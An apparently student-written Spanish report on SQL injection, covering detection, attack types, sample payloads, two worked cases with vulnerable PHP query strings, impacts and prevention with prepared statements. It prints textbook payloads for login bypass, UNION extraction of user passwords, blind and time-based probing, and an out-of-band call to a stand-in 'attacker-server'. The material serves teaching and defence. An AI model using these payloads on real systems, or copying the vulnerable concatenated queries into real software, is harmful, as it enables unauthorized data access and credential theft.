¿Qué es la inyección SQL?

La inyección SQL es una vulnerabilidad de seguridad que permite a un atacante interferir

con las consultas que una aplicación realiza a su base de datos (OpenWebinars, 2017). Esta
técnica de ataque se aprovecha de la falta de validación o sanitización de las entradas de
usuario en las aplicaciones web.
La inyección SQL ocurre cuando un atacante es capaz de insertar o "inyectar" instrucciones
SQL maliciosas dentro de las consultas que la aplicación envía a la base de datos. Esto se
logra manipulando los datos de entrada que la aplicación utiliza para construir sus consultas
SQL.
El problema fundamental radica en la forma en que muchas aplicaciones construyen sus
consultas SQL: concatenando directamente las entradas del usuario con el resto de la
consulta, sin realizar una adecuada validación o escape de caracteres especiales.

Cómo funciona un ataque de inyección SQL

El proceso de un ataque de inyección SQL típicamente sigue estos pasos:

1. El atacante identifica un punto de entrada en la aplicación donde se aceptan datos
del usuario que luego se utilizan en consultas SQL.
2. El atacante envía datos maliciosos que contienen fragmentos de código SQL.
3. La aplicación incorpora estos datos maliciosos directamente en su consulta SQL sin
la debida sanitización.
4. La base de datos ejecuta la consulta maliciosa, que puede resultar en acceso no
autorizado, modificación o eliminación de datos.
Para prevenir estos ataques, es crucial utilizar consultas parametrizadas, validar y sanitizar
todas las entradas de usuario, y seguir el principio de mínimo privilegio en la configuración
de la base de datos (OpenWebinars, 2017).
Cómo detectar una inyección SQL
Según la información proporcionada por ciberseguridad.com, existen varias formas de
detectar una inyección SQL. A continuación, se detallan los principales métodos:
1. Análisis de código fuente
Este método implica revisar manualmente el código fuente de la aplicación para identificar
vulnerabilidades potenciales. Se buscan principalmente:
  Uso de consultas SQL dinámicas
 Falta de validación o sanitización de entradas de usuario
 Uso inadecuado de funciones de escape
2. Pruebas de penetración
Las pruebas de penetración implican intentar explotar activamente las vulnerabilidades de
inyección SQL en una aplicación. Esto puede incluir:
 Insertar caracteres especiales (como comillas simples) en los campos de entrada
 Intentar modificar consultas SQL existentes
 Probar diferentes payloads de inyección SQL
3. Uso de herramientas automatizadas
Existen diversas herramientas diseñadas específicamente para detectar vulnerabilidades de
inyección SQL. Algunas de las más populares son:
 SQLmap
 Acunetix
 Nessus
 OWASP ZAP
Estas herramientas pueden escanear aplicaciones web en busca de vulnerabilidades
conocidas y potenciales.
4. Monitoreo de tráfico de red
El análisis del tráfico de red puede revelar intentos de inyección SQL. Se buscan patrones
sospechosos en las solicitudes HTTP, como:
 Uso excesivo de caracteres especiales SQL
 Presencia de palabras clave SQL en lugares inesperados
 Solicitudes anormalmente largas o complejas
5. Análisis de logs
Revisar los logs de la aplicación y de la base de datos puede ayudar a detectar intentos de
inyección SQL. Se buscan:
 Errores SQL inusuales
 Consultas SQL malformadas
 Patrones de acceso sospechosos
6. Honeypots
Los honeypots son sistemas señuelo diseñados para atraer y detectar ataques. Pueden
configurarse para detectar específicamente intentos de inyección SQL.
7. Educación y concientización
Aunque no es un método técnico de detección, educar a los desarrolladores y
administradores sobre las inyecciones SQL y cómo prevenirlas es crucial para la detección
temprana y la prevención.
Es importante recordar que la detección de inyecciones SQL debe ser un proceso continuo
y multifacético. La combinación de estos métodos proporciona la mejor oportunidad de
identificar y mitigar las vulnerabilidades de inyección SQL antes de que puedan ser
explotadas.

Tipos de Inyección SQL

Según la información proporcionada por ciberseguridad.com, existen varios tipos de
inyección SQL. A continuación, se detallan los principales:
1. Inyección SQL basada en la unión
Este tipo de inyección utiliza el operador UNION para combinar los resultados de dos o
más declaraciones SELECT en un único conjunto de resultados.
Ejemplo:
sql
Copy
' UNION SELECT username, password FROM users--
2. Inyección SQL basada en errores
Esta técnica aprovecha los mensajes de error generados por la base de datos para obtener
información sobre su estructura.
Ejemplo:
sql
Copy
' AND 1=CONVERT(int, (SELECT TOP 1 name FROM sysobjects WHERE xtype='U'))--
3. Inyección SQL booleana ciega
En este tipo de inyección, el atacante envía consultas verdadero/falso a la base de datos y
determina el resultado basándose en la respuesta de la aplicación.
Ejemplo:
sql
Copy
' AND 1=1-- (verdadero)
' AND 1=2-- (falso)
4. Inyección SQL basada en el tiempo
Esta técnica implica enviar una consulta a la base de datos que hace que esta espere (usando
SLEEP o funciones similares) antes de responder. El tiempo de respuesta indica si la
consulta fue verdadera o falsa.
Ejemplo:
sql
Copy
' IF (1=1) WAITFOR DELAY '0:0:5'--
5. Inyección SQL fuera de banda
Este método se utiliza cuando no es posible recibir la respuesta a través del mismo canal
utilizado para inyectar el código SQL. El atacante fuerza a la base de datos a realizar una
conexión saliente para extraer datos.
Ejemplo:
sql
Copy
'; EXEC master..xp_dirtree '\\attacker-server\share'--
6. Inyección SQL de segundo orden
En este tipo de ataque, el payload malicioso se almacena en la base de datos para su
ejecución posterior. Es particularmente difícil de detectar porque la inyección y la
ejecución ocurren en momentos diferentes.
Ejemplo:
1. El atacante inserta: O'Brien
2. Más tarde, se ejecuta: SELECT * FROM users WHERE name = 'O'Brien'

Ejemplos de ataques de inyección SQL

Caso práctico 1: Bypass de autenticación
Escenario: Un formulario de login típico.
Código vulnerable:
sql
$query = "SELECT * FROM users WHERE username = '$username' AND password =
'$password'";
Ataque: El atacante podría ingresar lo siguiente en el campo de usuario:
admin' --
La consulta resultante sería:
sql

SELECT * FROM users WHERE username = 'admin' -- ' AND password = ''
Esto comentaría la parte de la contraseña, permitiendo el acceso como administrador sin
conocer la contraseña real.
Caso práctico 2: Extracción de información
Escenario: Una página que muestra productos basados en una categoría seleccionada por el
usuario.
Código vulnerable:
sql
$query = "SELECT * FROM products WHERE category = '$category'";
Ataque: El atacante podría ingresar:
1' UNION SELECT username, password FROM users --
La consulta resultante sería:
sql
SELECT * FROM products WHERE category = '1' UNION SELECT username, password
FROM users --'
Esto permitiría al atacante obtener los nombres de usuario y contraseñas de la tabla de
usuarios.
Impacto y Consecuencias
Riesgos para la seguridad de los datos
 1. Acceso no autorizado: Los atacantes pueden obtener acceso a datos sensibles,
incluyendo información personal de usuarios, datos financieros y secretos
comerciales (eSecurityPlanet, s.f.).
2. Modificación de datos: Los atacantes pueden alterar, insertar o eliminar registros en
la base de datos, comprometiendo la integridad de la información (eSecurityPlanet,
s.f.).
3. Escalada de privilegios: Un atacante podría elevar sus privilegios en el sistema,
potencialmente obteniendo acceso de administrador (eSecurityPlanet, s.f.).
4. Ejecución de comandos remotos: En algunos casos, los atacantes pueden ejecutar
comandos en el servidor, lo que podría llevar a un compromiso total del sistema
(eSecurityPlanet, s.f.).
Posibles daños a la organización
1. Pérdidas financieras: Desde costos directos por robo de información financiera hasta
gastos en mitigación y recuperación (eSecurityPlanet, s.f.).
2. Daño reputacional: La pérdida de confianza de los clientes y socios comerciales
puede tener efectos a largo plazo en la reputación de la empresa (eSecurityPlanet,
s.f.).
3. Consecuencias legales: Incumplimiento de regulaciones de protección de datos
como GDPR, lo que puede resultar en multas significativas (eSecurityPlanet, s.f.).
4. Interrupción del negocio: Los ataques pueden causar tiempo de inactividad en
sistemas críticos, afectando las operaciones comerciales (eSecurityPlanet, s.f.).
5. Espionaje industrial: Los competidores podrían obtener acceso a información
propietaria, afectando la ventaja competitiva de la organización (eSecurityPlanet,
s.f.).
Métodos de Prevención
1. Uso de consultas parametrizadas:
o Implementar consultas preparadas (prepared statements) con parámetros
vinculados (eSecurityPlanet, s.f.).
o Ejemplo en PHP:
php
Copy
 $stmt = $pdo->prepare('SELECT * FROM employees WHERE name
= :name');
$stmt->execute(array('name' => $name));
2. Validación y sanitización de entradas:
o Implementar una validación estricta de todas las entradas de usuario
(eSecurityPlanet, s.f.).
o Utilizar listas blancas para caracteres permitidos.
o Ejemplo:
php
Copy
$input = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
3. Uso de ORM (Object-Relational Mapping):
o Utilizar frameworks ORM que manejan automáticamente la sanitización de
consultas (eSecurityPlanet, s.f.).
4. Principio de menor privilegio:
o Asignar a las cuentas de base de datos solo los permisos mínimos necesarios
(eSecurityPlanet, s.f.).
o Utilizar diferentes cuentas para diferentes funciones de la aplicación.
5. Implementación de WAF (Web Application Firewall):
o Utilizar un WAF para detectar y bloquear patrones de ataque conocidos
(eSecurityPlanet, s.f.).
6. Escape de caracteres especiales:
o Utilizar funciones de escape específicas del sistema de base de datos
(eSecurityPlanet, s.f.).
o Ejemplo en MySQL:
php
Copy
$name = $mysqli->real_escape_string($name);
7. Manejo de errores:
o Evitar mostrar mensajes de error detallados que puedan revelar información
sobre la estructura de la base de datos (eSecurityPlanet, s.f.).
 8. Actualizaciones y parches:
o Mantener actualizados todos los sistemas, frameworks y bibliotecas
utilizadas en la aplicación (eSecurityPlanet, s.f.)
9. Auditorías de seguridad regulares:
o Realizar pruebas de penetración y revisiones de código para identificar
vulnerabilidades (eSecurityPlanet, s.f.).
10. Educación y concientización:
o Capacitar a los desarrolladores en prácticas de codificación segura y
concienciar sobre los riesgos de la inyección SQL (eSecurityPlanet, s.f.).
Implementando estas medidas de prevención, las organizaciones pueden reducir
significativamente el riesgo de ataques de inyección SQL y proteger sus datos y sistemas
críticos.
Referencias
Ciberseguridad.com. (s.f.). Inyección SQL. Recuperado el 23 de junio de 2024, de
https://ciberseguridad.com/amenzas/vulnerabilidades/inyeccion-sql/
#1_Inyeccion_SQL_basada_en_la_union
eSecurityPlanet. (s.f.). How to Prevent SQL Injection Attacks. Recuperado el 23 de junio
de 2024, de https://www.esecurityplanet.com/threats/how-to-prevent-sql-injection-attacks/
OpenWebinars. (2017, 12 de octubre). ¿Qué es SQL Injection?
https://openwebinars.net/blog/que-es-sql-injection/
OWASP. (2021). A03:2021 – Injection. https://owasp.org/Top10/A03_2021-Injection/
OWASP. (s.f.). SQL Injection Prevention Cheat Sheet.
https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.ht
ml
PHP. (s.f.). SQL Injection. https://www.php.net/manual/es/security.database.sql-
injection.php
Sucuri. (2022). Understanding Website SQL Injections.
https://blog.sucuri.net/2022/01/understanding-website-sql-injections.html